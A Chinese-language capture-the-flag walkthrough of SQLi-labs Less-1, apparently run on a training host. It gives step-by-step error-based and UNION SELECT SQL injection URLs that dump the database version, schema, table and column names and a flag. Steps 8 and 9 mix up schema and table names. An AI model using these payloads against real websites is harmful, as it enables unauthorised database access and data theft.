Less-1

Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

1.判断是否存在注入

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1'

错误回显 => 存在注入点

2.判断参数类型

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1 and 1=2

正常显示

判断参数为字符型

3.进行参数闭合

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' and 1=2 --+

错误回显

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' and 1=1 --+

正确回显 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' order by 3 --+

正常回显

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=1' order by 4 --+

错误回显 => 表有3列

5.进行 union select联合查询，发现显示位

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,3 --+

2,3显示出来 => 2,3处为显示位

6.查看数据库版本

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,version() --+

7.查看所有的数据库

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

8.查看数据库的表

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="BRqPdnqd"--+

9.查看ec26n7Hw表中的列

https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="BRqPdnqd" --+

10.查看表中的flag列中的数据

 https://636-b39c3458-1b6b-4e3a-9086-748effcc8820.do-not-trust.hacking.run/?id=-1' union select 1,2,group_concat(flag) from BRqPdnqd--+